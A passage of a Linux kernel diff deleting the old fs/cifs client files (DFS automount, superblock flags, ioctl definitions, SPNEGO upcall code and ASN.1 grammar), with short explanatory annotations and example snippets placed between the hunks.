+-	if (rc < 0) {
+-		cifs_dbg(FYI, "%s: Failed to resolve server part of %s to IP: %d\n",
+-			 __func__, name, rc);
+-		goto compose_mount_options_err;
+-	}
+-
+-	/*
+-	 * In most cases, we'll be building a shorter string than the original,
+-	 * but we do have to assume that the address in the ip= option may be
+-	 * much longer than the original. Add the max length of an address
+-	 * string to the length of the original string to allow for worst case.
+-	 */
+-	md_len = strlen(sb_mountdata) + INET6_ADDRSTRLEN;
+-	mountdata = kzalloc(md_len + sizeof("ip=") + 1, GFP_KERNEL);
+-	if (mountdata == NULL) {
+-		rc = -ENOMEM;
+-		goto compose_mount_options_err;
+-	}
+-
+-	/* copy all options except of unc,ip,prefixpath */
+-	off = 0;
+-	if (strncmp(sb_mountdata, "sep=", 4) == 0) {
+-			sep = sb_mountdata[4];
+-			strncpy(mountdata, sb_mountdata, 5);
+-			off += 5;
+-	}
+-
+-	do {
+-		tkn_e = strchr(sb_mountdata + off, sep);
+-		if (tkn_e == NULL)
+-			noff = strlen(sb_mountdata + off);
+-		else
+-			noff = tkn_e - (sb_mountdata + off) + 1;
+-
+-		if (strncasecmp(sb_mountdata + off, "cruid=", 6) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		if (strncasecmp(sb_mountdata + off, "unc=", 4) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		if (strncasecmp(sb_mountdata + off, "ip=", 3) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		if (strncasecmp(sb_mountdata + off, "prefixpath=", 11) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		strncat(mountdata, sb_mountdata + off, noff);
+-		off += noff;
+-	} while (tkn_e);
+-	strcat(mountdata, sb_mountdata + off);
+-	mountdata[md_len] = '\0';
+-
+-	/* copy new IP and ref share name */
+-	if (mountdata[strlen(mountdata) - 1] != sep)
+-		strncat(mountdata, &sep, 1);
+-	strcat(mountdata, "ip=");
+-	strcat(mountdata, srvIP);
+-
+-	if (devname)
+-		*devname = name;
+-	else
+-		kfree(name);
+-
+-	/*cifs_dbg(FYI, "%s: parent mountdata: %s\n", __func__, sb_mountdata);*/
+-	/*cifs_dbg(FYI, "%s: submount mountdata: %s\n", __func__, mountdata );*/
+-
+-compose_mount_options_out:
+-	kfree(srvIP);
+-	return mountdata;
+-
+-compose_mount_options_err:
+-	kfree(mountdata);
+-	mountdata = ERR_PTR(rc);
+-	kfree(name);
+-	goto compose_mount_options_out;
+-}
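
Illustrative input and output for the token filter above (addresses and
share names hypothetical):

	/*
	 * sb_mountdata: "user=foo,unc=\\old\share,ip=1.2.3.4,vers=3.0"
	 * referral UNC: "\\srv2\share2"
	 *
	 * kept    : "user=foo," and "vers=3.0" (copied token by token)
	 * dropped : the stale unc=, ip=, prefixpath= and cruid= tokens
	 * appended: ",ip=10.0.0.7" (freshly resolved for srv2)
	 *
	 * mountdata: "user=foo,vers=3.0,ip=10.0.0.7"
	 * *devname : "//srv2/share2"
	 */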
+-
+-/**
+- * cifs_dfs_do_mount - mounts specified path using DFS full path
+- *
+- * Always pass down @fullpath to smb3_do_mount() so we can use the root server
+- * to perform failover in case we failed to connect to the first target in the
+- * referral.
+- *
+- * @mntpt:		directory entry for the path we are trying to automount
+- * @cifs_sb:		parent/root superblock
+- * @fullpath:		full path in UNC format
+- */
+-static struct vfsmount *cifs_dfs_do_mount(struct dentry *mntpt,
+-					  struct cifs_sb_info *cifs_sb,
+-					  const char *fullpath)
+-{
+-	struct vfsmount *mnt;
+-	char *mountdata;
+-	char *devname;
+-
+-	devname = kstrdup(fullpath, GFP_KERNEL);
+-	if (!devname)
+-		return ERR_PTR(-ENOMEM);
+-
+-	convert_delimiter(devname, '/');
+-
+-	/* TODO: change to call fs_context_for_mount(), fill in context directly, call fc_mount */
+-
+-	/* See afs_mntpt_do_automount in fs/afs/mntpt.c for an example */
+-
+-	/* strip first '\' from fullpath */
+-	mountdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options,
+-					       fullpath + 1, NULL, NULL);
+-	if (IS_ERR(mountdata)) {
+-		kfree(devname);
+-		return (struct vfsmount *)mountdata;
+-	}
+-
+-	mnt = vfs_submount(mntpt, &cifs_fs_type, devname, mountdata);
+-	kfree(mountdata);
+-	kfree(devname);
+-	return mnt;
+-}
+-
+-/*
+- * Create a vfsmount that we can automount
+- */
+-static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
+-{
+-	struct cifs_sb_info *cifs_sb;
+-	void *page;
+-	char *full_path;
+-	struct vfsmount *mnt;
+-
+-	cifs_dbg(FYI, "in %s\n", __func__);
+-	BUG_ON(IS_ROOT(mntpt));
+-
+-	/*
+-	 * The MSDFS spec states that paths in DFS referral requests and
+-	 * responses must be prefixed by a single '\' character instead of
+-	 * the double backslashes usually used in the UNC. This function
+-	 * gives us the latter, so we must adjust the result.
+-	 */
+-	cifs_sb = CIFS_SB(mntpt->d_sb);
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) {
+-		mnt = ERR_PTR(-EREMOTE);
+-		goto cdda_exit;
+-	}
+-
+-	page = alloc_dentry_path();
+-	/* always use tree name prefix */
+-	full_path = build_path_from_dentry_optional_prefix(mntpt, page, true);
+-	if (IS_ERR(full_path)) {
+-		mnt = ERR_CAST(full_path);
+-		goto free_full_path;
+-	}
+-
+-	convert_delimiter(full_path, '\\');
+-	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+-
+-	mnt = cifs_dfs_do_mount(mntpt, cifs_sb, full_path);
+-	cifs_dbg(FYI, "%s: cifs_dfs_do_mount:%s , mnt:%p\n", __func__, full_path + 1, mnt);
+-
+-free_full_path:
+-	free_dentry_path(page);
+-cdda_exit:
+-	cifs_dbg(FYI, "leaving %s\n" , __func__);
+-	return mnt;
+-}
+-
+-/*
+- * Attempt to automount the referral
+- */
+-struct vfsmount *cifs_dfs_d_automount(struct path *path)
+-{
+-	struct vfsmount *newmnt;
+-
+-	cifs_dbg(FYI, "in %s\n", __func__);
+-
+-	newmnt = cifs_dfs_do_automount(path->dentry);
+-	if (IS_ERR(newmnt)) {
+-		cifs_dbg(FYI, "leaving %s [automount failed]\n" , __func__);
+-		return newmnt;
+-	}
+-
+-	mntget(newmnt); /* prevent immediate expiration */
+-	mnt_set_expiry(newmnt, &cifs_dfs_automount_list);
+-	schedule_delayed_work(&cifs_dfs_automount_task,
+-			      cifs_dfs_mountpoint_expiry_timeout);
+-	cifs_dbg(FYI, "leaving %s [ok]\n" , __func__);
+-	return newmnt;
+-}
+-
+-const struct inode_operations cifs_dfs_referral_inode_operations = {
+-};
+diff --git a/fs/cifs/cifs_fs_sb.h b/fs/cifs/cifs_fs_sb.h
+deleted file mode 100644
+index 013a4bd65280c..0000000000000
+--- a/fs/cifs/cifs_fs_sb.h
++++ /dev/null
+@@ -1,76 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2004
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/rbtree.h>
+-
+-#ifndef _CIFS_FS_SB_H
+-#define _CIFS_FS_SB_H
+-
+-#include <linux/backing-dev.h>
+-
+-#define CIFS_MOUNT_NO_PERM      1 /* do not do client vfs_perm check */
+-#define CIFS_MOUNT_SET_UID      2 /* set current's euid in create etc. */
+-#define CIFS_MOUNT_SERVER_INUM  4 /* inode numbers from uniqueid from server  */
+-#define CIFS_MOUNT_DIRECT_IO    8 /* do not write nor read through page cache */
+-#define CIFS_MOUNT_NO_XATTR     0x10  /* if set - disable xattr support       */
+-#define CIFS_MOUNT_MAP_SPECIAL_CHR 0x20 /* remap illegal chars in filenames   */
+-#define CIFS_MOUNT_POSIX_PATHS  0x40  /* Negotiate posix pathnames if possible*/
+-#define CIFS_MOUNT_UNX_EMUL     0x80  /* Network compat with SFUnix emulation */
+-#define CIFS_MOUNT_NO_BRL       0x100 /* No sending byte range locks to srv   */
+-#define CIFS_MOUNT_CIFS_ACL     0x200 /* send ACL requests to non-POSIX srv   */
+-#define CIFS_MOUNT_OVERR_UID    0x400 /* override uid returned from server    */
+-#define CIFS_MOUNT_OVERR_GID    0x800 /* override gid returned from server    */
+-#define CIFS_MOUNT_DYNPERM      0x1000 /* allow in-memory only mode setting   */
+-#define CIFS_MOUNT_NOPOSIXBRL   0x2000 /* mandatory not posix byte range lock */
+-#define CIFS_MOUNT_NOSSYNC      0x4000 /* don't do slow SMBflush on every sync*/
+-#define CIFS_MOUNT_FSCACHE	0x8000 /* local caching enabled */
+-#define CIFS_MOUNT_MF_SYMLINKS	0x10000 /* Minshall+French Symlinks enabled */
+-#define CIFS_MOUNT_MULTIUSER	0x20000 /* multiuser mount */
+-#define CIFS_MOUNT_STRICT_IO	0x40000 /* strict cache mode */
+-#define CIFS_MOUNT_RWPIDFORWARD	0x80000 /* use pid forwarding for rw */
+-#define CIFS_MOUNT_POSIXACL	0x100000 /* mirror of SB_POSIXACL in mnt_cifs_flags */
+-#define CIFS_MOUNT_CIFS_BACKUPUID 0x200000 /* backup intent bit for a user */
+-#define CIFS_MOUNT_CIFS_BACKUPGID 0x400000 /* backup intent bit for a group */
+-#define CIFS_MOUNT_MAP_SFM_CHR	0x800000 /* SFM/MAC mapping for illegal chars */
+-#define CIFS_MOUNT_USE_PREFIX_PATH 0x1000000 /* make subpath with inaccessible
+-					      * root mountable
+-					      */
+-#define CIFS_MOUNT_UID_FROM_ACL 0x2000000 /* try to get UID via special SID */
+-#define CIFS_MOUNT_NO_HANDLE_CACHE 0x4000000 /* disable caching dir handles */
+-#define CIFS_MOUNT_NO_DFS 0x8000000 /* disable DFS resolving */
+-#define CIFS_MOUNT_MODE_FROM_SID 0x10000000 /* retrieve mode from special ACE */
+-#define CIFS_MOUNT_RO_CACHE	0x20000000  /* assumes share will not change */
+-#define CIFS_MOUNT_RW_CACHE	0x40000000  /* assumes only client accessing */
+-#define CIFS_MOUNT_SHUTDOWN	0x80000000
+-
+-struct cifs_sb_info {
+-	struct rb_root tlink_tree;
+-	spinlock_t tlink_tree_lock;
+-	struct tcon_link *master_tlink;
+-	struct nls_table *local_nls;
+-	struct smb3_fs_context *ctx;
+-	atomic_t active;
+-	unsigned int mnt_cifs_flags;
+-	struct delayed_work prune_tlinks;
+-	struct rcu_head rcu;
+-
+-	/* only used when CIFS_MOUNT_USE_PREFIX_PATH is set */
+-	char *prepath;
+-
+-	/* randomly generated 128-bit number for indexing dfs mount groups in referral cache */
+-	uuid_t dfs_mount_id;
+-	/*
+-	 * Indicate whether serverino option was turned off later
+-	 * (cifs_autodisable_serverino) in order to match new mounts.
+-	 */
+-	bool mnt_cifs_serverino_autodisabled;
+-	/*
+-	 * Available once the mount has completed.
+-	 */
+-	struct dentry *root;
+-};
+-#endif				/* _CIFS_FS_SB_H */
+diff --git a/fs/cifs/cifs_ioctl.h b/fs/cifs/cifs_ioctl.h
+deleted file mode 100644
+index d86d78d5bfdc1..0000000000000
+--- a/fs/cifs/cifs_ioctl.h
++++ /dev/null
+@@ -1,126 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Structure definitions for io control for cifs/smb3
+- *
+- *   Copyright (c) 2015 Steve French <steve.french@primarydata.com>
+- *
+- */
+-
+-struct smb_mnt_fs_info {
+-	__u32	version; /* 0001 */
+-	__u16	protocol_id;
+-	__u16	tcon_flags;
+-	__u32	vol_serial_number;
+-	__u32	vol_create_time;
+-	__u32	share_caps;
+-	__u32	share_flags;
+-	__u32	sector_flags;
+-	__u32	optimal_sector_size;
+-	__u32	max_bytes_chunk;
+-	__u32	fs_attributes;
+-	__u32	max_path_component;
+-	__u32	device_type;
+-	__u32	device_characteristics;
+-	__u32	maximal_access;
+-	__u64   cifs_posix_caps;
+-} __packed;
+-
+-struct smb_snapshot_array {
+-	__u32	number_of_snapshots;
+-	__u32	number_of_snapshots_returned;
+-	__u32	snapshot_array_size;
+-	/*	snapshots[]; */
+-} __packed;
+-
+-/* query_info flags */
+-#define PASSTHRU_QUERY_INFO	0x00000000
+-#define PASSTHRU_FSCTL		0x00000001
+-#define PASSTHRU_SET_INFO	0x00000002
+-struct smb_query_info {
+-	__u32   info_type;
+-	__u32   file_info_class;
+-	__u32   additional_information;
+-	__u32   flags;
+-	__u32	input_buffer_length;
+-	__u32	output_buffer_length;
+-	/* char buffer[]; */
+-} __packed;
+-
+-/*
+- * Dumping the commonly used 16 byte (e.g. CCM and GCM128) keys is still
+- * supported for backlevel compatibility, but is not sufficient for dumping the less
+- * frequently used GCM256 (32 byte) keys (see the newer "CIFS_DUMP_FULL_KEY"
+- * ioctl for dumping decryption info for GCM256 mounts)
+- */
+-struct smb3_key_debug_info {
+-	__u64	Suid;
+-	__u16	cipher_type;
+-	__u8	auth_key[16]; /* SMB2_NTLMV2_SESSKEY_SIZE */
+-	__u8	smb3encryptionkey[SMB3_SIGN_KEY_SIZE];
+-	__u8	smb3decryptionkey[SMB3_SIGN_KEY_SIZE];
+-} __packed;
+-
+-/*
+- * Dump variable-sized keys
+- */
+-struct smb3_full_key_debug_info {
+-	/* INPUT: size of userspace buffer */
+-	__u32   in_size;
+-
+-	/*
+-	 * INPUT: 0 for current user, otherwise session to dump
+-	 * OUTPUT: session id that was dumped
+-	 */
+-	__u64	session_id;
+-	__u16	cipher_type;
+-	__u8    session_key_length;
+-	__u8    server_in_key_length;
+-	__u8    server_out_key_length;
+-	__u8    data[];
+-	/*
+-	 * return this struct with the keys appended at the end:
+-	 * __u8 session_key[session_key_length];
+-	 * __u8 server_in_key[server_in_key_length];
+-	 * __u8 server_out_key[server_out_key_length];
+-	 */
+-} __packed;
+-
+-struct smb3_notify {
+-	__u32	completion_filter;
+-	bool	watch_tree;
+-} __packed;
+-
+-struct smb3_notify_info {
+-	__u32	completion_filter;
+-	bool	watch_tree;
+-	__u32   data_len; /* size of notify data below */
+-	__u8	notify_data[];
+-} __packed;
+-
+-#define CIFS_IOCTL_MAGIC	0xCF
+-#define CIFS_IOC_COPYCHUNK_FILE	_IOW(CIFS_IOCTL_MAGIC, 3, int)
+-#define CIFS_IOC_SET_INTEGRITY  _IO(CIFS_IOCTL_MAGIC, 4)
+-#define CIFS_IOC_GET_MNT_INFO _IOR(CIFS_IOCTL_MAGIC, 5, struct smb_mnt_fs_info)
+-#define CIFS_ENUMERATE_SNAPSHOTS _IOR(CIFS_IOCTL_MAGIC, 6, struct smb_snapshot_array)
+-#define CIFS_QUERY_INFO _IOWR(CIFS_IOCTL_MAGIC, 7, struct smb_query_info)
+-#define CIFS_DUMP_KEY _IOWR(CIFS_IOCTL_MAGIC, 8, struct smb3_key_debug_info)
+-#define CIFS_IOC_NOTIFY _IOW(CIFS_IOCTL_MAGIC, 9, struct smb3_notify)
+-#define CIFS_DUMP_FULL_KEY _IOWR(CIFS_IOCTL_MAGIC, 10, struct smb3_full_key_debug_info)
+-#define CIFS_IOC_NOTIFY_INFO _IOWR(CIFS_IOCTL_MAGIC, 11, struct smb3_notify_info)
+-#define CIFS_IOC_SHUTDOWN _IOR ('X', 125, __u32)
+-
+-/*
+- * Flags for going down operation
+- */
+-#define CIFS_GOING_FLAGS_DEFAULT                0x0     /* going down */
+-#define CIFS_GOING_FLAGS_LOGFLUSH               0x1     /* flush log but not data */
+-#define CIFS_GOING_FLAGS_NOLOGFLUSH             0x2     /* don't flush log nor data */
+-
+-static inline bool cifs_forced_shutdown(struct cifs_sb_info *sbi)
+-{
+-	if (CIFS_MOUNT_SHUTDOWN & sbi->mnt_cifs_flags)
+-		return true;
+-	else
+-		return false;
+-}
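
A minimal userspace sketch of issuing one of the ioctls defined above
against a file on a CIFS mount (assumes the struct and ioctl numbers
from this header are available to the program):

	#include <fcntl.h>
	#include <stdio.h>
	#include <sys/ioctl.h>
	#include <unistd.h>

	int main(int argc, char **argv)
	{
		struct smb_mnt_fs_info info = { 0 };
		int fd = open(argc > 1 ? argv[1] : ".", O_RDONLY);

		if (fd < 0 || ioctl(fd, CIFS_IOC_GET_MNT_INFO, &info) < 0) {
			perror("CIFS_IOC_GET_MNT_INFO");
			return 1;
		}
		printf("protocol id 0x%x share flags 0x%x\n",
		       info.protocol_id, info.share_flags);
		close(fd);
		return 0;
	}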
+diff --git a/fs/cifs/cifs_spnego.c b/fs/cifs/cifs_spnego.c
+deleted file mode 100644
+index 342717bf1dc28..0000000000000
+--- a/fs/cifs/cifs_spnego.c
++++ /dev/null
+@@ -1,236 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *   SPNEGO upcall management for CIFS
+- *
+- *   Copyright (c) 2007 Red Hat, Inc.
+- *   Author(s): Jeff Layton (jlayton@redhat.com)
+- *
+- */
+-
+-#include <linux/list.h>
+-#include <linux/slab.h>
+-#include <linux/string.h>
+-#include <keys/user-type.h>
+-#include <linux/key-type.h>
+-#include <linux/keyctl.h>
+-#include <linux/inet.h>
+-#include "cifsglob.h"
+-#include "cifs_spnego.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-static const struct cred *spnego_cred;
+-
+-/* create a new cifs key */
+-static int
+-cifs_spnego_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
+-{
+-	char *payload;
+-	int ret;
+-
+-	ret = -ENOMEM;
+-	payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
+-	if (!payload)
+-		goto error;
+-
+-	/* attach the data */
+-	key->payload.data[0] = payload;
+-	ret = 0;
+-
+-error:
+-	return ret;
+-}
+-
+-static void
+-cifs_spnego_key_destroy(struct key *key)
+-{
+-	kfree(key->payload.data[0]);
+-}
+-
+-
+-/*
+- * keytype for CIFS spnego keys
+- */
+-struct key_type cifs_spnego_key_type = {
+-	.name		= "cifs.spnego",
+-	.instantiate	= cifs_spnego_key_instantiate,
+-	.destroy	= cifs_spnego_key_destroy,
+-	.describe	= user_describe,
+-};
+-
+-/* length of longest version string e.g.  strlen("ver=0xFF") */
+-#define MAX_VER_STR_LEN		8
+-
+-/* length of longest security mechanism name, e.g. in future could have
+- * strlen(";sec=ntlmsspi") */
+-#define MAX_MECH_STR_LEN	13
+-
+-/* strlen of "host=" */
+-#define HOST_KEY_LEN		5
+-
+-/* strlen of ";ip4=" or ";ip6=" */
+-#define IP_KEY_LEN		5
+-
+-/* strlen of ";uid=0x" */
+-#define UID_KEY_LEN		7
+-
+-/* strlen of ";creduid=0x" */
+-#define CREDUID_KEY_LEN		11
+-
+-/* strlen of ";user=" */
+-#define USER_KEY_LEN		6
+-
+-/* strlen of ";pid=0x" */
+-#define PID_KEY_LEN		7
+-
+-/* get a key struct with a SPNEGO security blob, suitable for session setup */
+-struct key *
+-cifs_get_spnego_key(struct cifs_ses *sesInfo,
+-		    struct TCP_Server_Info *server)
+-{
+-	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
+-	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
+-	char *description, *dp;
+-	size_t desc_len;
+-	struct key *spnego_key;
+-	const char *hostname = server->hostname;
+-	const struct cred *saved_cred;
+-
+-	/* length of fields (with semicolons): ver=0xyz ip4=ipaddress
+-	   host=hostname sec=mechanism uid=0xFF user=username */
+-	desc_len = MAX_VER_STR_LEN +
+-		   HOST_KEY_LEN + strlen(hostname) +
+-		   IP_KEY_LEN + INET6_ADDRSTRLEN +
+-		   MAX_MECH_STR_LEN +
+-		   UID_KEY_LEN + (sizeof(uid_t) * 2) +
+-		   CREDUID_KEY_LEN + (sizeof(uid_t) * 2) +
+-		   PID_KEY_LEN + (sizeof(pid_t) * 2) + 1;
+-
+-	if (sesInfo->user_name)
+-		desc_len += USER_KEY_LEN + strlen(sesInfo->user_name);
+-
+-	spnego_key = ERR_PTR(-ENOMEM);
+-	description = kzalloc(desc_len, GFP_KERNEL);
+-	if (description == NULL)
+-		goto out;
+-
+-	dp = description;
+-	/* start with version and hostname portion of UNC string */
+-	spnego_key = ERR_PTR(-EINVAL);
+-	sprintf(dp, "ver=0x%x;host=%s;", CIFS_SPNEGO_UPCALL_VERSION,
+-		hostname);
+-	dp = description + strlen(description);
+-
+-	/* add the server address */
+-	if (server->dstaddr.ss_family == AF_INET)
+-		sprintf(dp, "ip4=%pI4", &sa->sin_addr);
+-	else if (server->dstaddr.ss_family == AF_INET6)
+-		sprintf(dp, "ip6=%pI6", &sa6->sin6_addr);
+-	else
+-		goto out;
+-
+-	dp = description + strlen(description);
+-
+-	/* for now, only sec=krb5 and sec=mskrb5 are valid */
+-	if (server->sec_kerberos)
+-		sprintf(dp, ";sec=krb5");
+-	else if (server->sec_mskerberos)
+-		sprintf(dp, ";sec=mskrb5");
+-	else {
+-		cifs_dbg(VFS, "unknown or missing server auth type, use krb5\n");
+-		sprintf(dp, ";sec=krb5");
+-	}
+-
+-	dp = description + strlen(description);
+-	sprintf(dp, ";uid=0x%x",
+-		from_kuid_munged(&init_user_ns, sesInfo->linux_uid));
+-
+-	dp = description + strlen(description);
+-	sprintf(dp, ";creduid=0x%x",
+-		from_kuid_munged(&init_user_ns, sesInfo->cred_uid));
+-
+-	if (sesInfo->user_name) {
+-		dp = description + strlen(description);
+-		sprintf(dp, ";user=%s", sesInfo->user_name);
+-	}
+-
+-	dp = description + strlen(description);
+-	sprintf(dp, ";pid=0x%x", current->pid);
+-
+-	cifs_dbg(FYI, "key description = %s\n", description);
+-	saved_cred = override_creds(spnego_cred);
+-	spnego_key = request_key(&cifs_spnego_key_type, description, "");
+-	revert_creds(saved_cred);
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-	if (cifsFYI && !IS_ERR(spnego_key)) {
+-		struct cifs_spnego_msg *msg = spnego_key->payload.data[0];
+-		cifs_dump_mem("SPNEGO reply blob:", msg->data, min(1024U,
+-				msg->secblob_len + msg->sesskey_len));
+-	}
+-#endif /* CONFIG_CIFS_DEBUG2 */
+-
+-out:
+-	kfree(description);
+-	return spnego_key;
+-}
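
For a Kerberos mount the description assembled above ends up looking
like this (host, address, uids and pid are illustrative only):

	ver=0x2;host=fileserver;ip4=192.168.1.50;sec=krb5;uid=0x3e8;creduid=0x3e8;user=alice;pid=0x4d2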
+-
+-int
+-init_cifs_spnego(void)
+-{
+-	struct cred *cred;
+-	struct key *keyring;
+-	int ret;
+-
+-	cifs_dbg(FYI, "Registering the %s key type\n",
+-		 cifs_spnego_key_type.name);
+-
+-	/*
+-	 * Create an override credential set with special thread keyring for
+-	 * spnego upcalls.
+-	 */
+-
+-	cred = prepare_kernel_cred(NULL);
+-	if (!cred)
+-		return -ENOMEM;
+-
+-	keyring = keyring_alloc(".cifs_spnego",
+-				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
+-				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
+-				KEY_USR_VIEW | KEY_USR_READ,
+-				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
+-	if (IS_ERR(keyring)) {
+-		ret = PTR_ERR(keyring);
+-		goto failed_put_cred;
+-	}
+-
+-	ret = register_key_type(&cifs_spnego_key_type);
+-	if (ret < 0)
+-		goto failed_put_key;
+-
+-	/*
+-	 * instruct request_key() to use this special keyring as a cache for
+-	 * the results it looks up
+-	 */
+-	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
+-	cred->thread_keyring = keyring;
+-	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
+-	spnego_cred = cred;
+-
+-	cifs_dbg(FYI, "cifs spnego keyring: %d\n", key_serial(keyring));
+-	return 0;
+-
+-failed_put_key:
+-	key_put(keyring);
+-failed_put_cred:
+-	put_cred(cred);
+-	return ret;
+-}
+-
+-void
+-exit_cifs_spnego(void)
+-{
+-	key_revoke(spnego_cred->thread_keyring);
+-	unregister_key_type(&cifs_spnego_key_type);
+-	put_cred(spnego_cred);
+-	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_spnego_key_type.name);
+-}
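For reference, the description assembled by cifs_get_spnego_key() above is a flat semicolon-separated string that the user-space cifs.upcall helper parses. A minimal stand-alone sketch of the same layout (every concrete value below is invented for illustration):

/*
 * Stand-alone sketch of the key description format built above;
 * host, address, uid and pid values are made up.
 */
#include <stdio.h>

int main(void)
{
	char desc[256];

	snprintf(desc, sizeof(desc),
		 "ver=0x%x;host=%s;ip4=%s;sec=%s;uid=0x%x;creduid=0x%x;user=%s;pid=0x%x",
		 2, "fileserver", "192.0.2.10", "krb5", 1000, 1000, "alice", 0x1a2b);
	printf("%s\n", desc);	/* what request_key() is asked to resolve */
	return 0;
}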
+diff --git a/fs/cifs/cifs_spnego.h b/fs/cifs/cifs_spnego.h
+deleted file mode 100644
+index 7f102ffeb6750..0000000000000
+--- a/fs/cifs/cifs_spnego.h
++++ /dev/null
+@@ -1,36 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *   SPNEGO upcall management for CIFS
+- *
+- *   Copyright (c) 2007 Red Hat, Inc.
+- *   Author(s): Jeff Layton (jlayton@redhat.com)
+- *              Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFS_SPNEGO_H
+-#define _CIFS_SPNEGO_H
+-
+-#define CIFS_SPNEGO_UPCALL_VERSION 2
+-
+-/*
+- * The version field should always be set to CIFS_SPNEGO_UPCALL_VERSION.
+- * The flags field is for future use. The request-key callout should set
+- * sesskey_len and secblob_len, and then concatenate the SessKey+SecBlob
+- * and stuff it in the data field.
+- */
+-struct cifs_spnego_msg {
+-	uint32_t	version;
+-	uint32_t	flags;
+-	uint32_t	sesskey_len;
+-	uint32_t	secblob_len;
+-	uint8_t		data[1];
+-};
+-
+-#ifdef __KERNEL__
+-extern struct key_type cifs_spnego_key_type;
+-extern struct key *cifs_get_spnego_key(struct cifs_ses *sesInfo,
+-				       struct TCP_Server_Info *server);
+-#endif /* KERNEL */
+-
+-#endif /* _CIFS_SPNEGO_H */
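A note on the structure above: because data[] is a one-element array rather than a C99 flexible array member, sizing a populated message needs the customary "- 1" correction. A hedged sketch, assuming the struct definition above (the helper name is illustrative, not part of the original header):

/*
 * Sketch: bytes needed for a cifs_spnego_msg whose data[] carries
 * SessKey followed by SecBlob; "- 1" cancels the data[1] placeholder.
 */
static inline size_t cifs_spnego_msg_size(const struct cifs_spnego_msg *msg)
{
	return sizeof(*msg) + msg->sesskey_len + msg->secblob_len - 1;
}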
+diff --git a/fs/cifs/cifs_spnego_negtokeninit.asn1 b/fs/cifs/cifs_spnego_negtokeninit.asn1
+deleted file mode 100644
+index 181c083887d51..0000000000000
+--- a/fs/cifs/cifs_spnego_negtokeninit.asn1
++++ /dev/null
+@@ -1,40 +0,0 @@
+-GSSAPI ::=
+-	[APPLICATION 0] IMPLICIT SEQUENCE {
+-		thisMech
+-			OBJECT IDENTIFIER ({cifs_gssapi_this_mech}),
+-		negotiationToken
+-			NegotiationToken
+-	}
+-
+-MechType ::= OBJECT IDENTIFIER ({cifs_neg_token_init_mech_type})
+-
+-MechTypeList ::= SEQUENCE OF MechType
+-
+-NegHints ::= SEQUENCE {
+-	hintName
+-		[0] GeneralString OPTIONAL,
+-	hintAddress
+-		[1] OCTET STRING OPTIONAL
+-	}
+-
+-NegTokenInit2 ::=
+-	SEQUENCE {
+-		mechTypes
+-			[0] MechTypeList OPTIONAL,
+-		reqFlags
+-			[1] BIT STRING OPTIONAL,
+-		mechToken
+-			[2] OCTET STRING OPTIONAL,
+-		negHints
+-			[3] NegHints OPTIONAL,
+-		mechListMIC
+-			[3] OCTET STRING OPTIONAL
+-	}
+-
+-NegotiationToken ::=
+-	CHOICE {
+-		negTokenInit
+-			[0] NegTokenInit2,
+-		negTokenTarg
+-			[1] ANY
+-	}
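For context, this grammar is fed to the kernel's ASN.1 compiler, which emits a table-driven decoder; each {name} annotation becomes a call to an action function with the asn1_action_t signature from include/linux/asn1_decoder.h. A sketch of such a callback (the body is illustrative only):

/*
 * Sketch of the action callback named by the {cifs_gssapi_this_mech}
 * annotation above; the body is illustrative.
 */
int cifs_gssapi_this_mech(void *context, size_t hdrlen,
			  unsigned char tag, const void *value, size_t vlen)
{
	/* compare value[0..vlen) with the SPNEGO OID; -EBADMSG on mismatch */
	return 0;
}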
+diff --git a/fs/cifs/cifs_swn.c b/fs/cifs/cifs_swn.c
+deleted file mode 100644
+index 7233c6a7e6d70..0000000000000
+--- a/fs/cifs/cifs_swn.c
++++ /dev/null
+@@ -1,674 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * Witness Service client for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#include <linux/kref.h>
+-#include <net/genetlink.h>
+-#include <uapi/linux/cifs/cifs_netlink.h>
+-
+-#include "cifs_swn.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "fscache.h"
+-#include "cifs_debug.h"
+-#include "netlink.h"
+-
+-static DEFINE_IDR(cifs_swnreg_idr);
+-static DEFINE_MUTEX(cifs_swnreg_idr_mutex);
+-
+-struct cifs_swn_reg {
+-	int id;
+-	struct kref ref_count;
+-
+-	const char *net_name;
+-	const char *share_name;
+-	bool net_name_notify;
+-	bool share_name_notify;
+-	bool ip_notify;
+-
+-	struct cifs_tcon *tcon;
+-};
+-
+-static int cifs_swn_auth_info_krb(struct cifs_tcon *tcon, struct sk_buff *skb)
+-{
+-	int ret;
+-
+-	ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_KRB_AUTH);
+-	if (ret < 0)
+-		return ret;
+-
+-	return 0;
+-}
+-
+-static int cifs_swn_auth_info_ntlm(struct cifs_tcon *tcon, struct sk_buff *skb)
+-{
+-	int ret;
+-
+-	if (tcon->ses->user_name != NULL) {
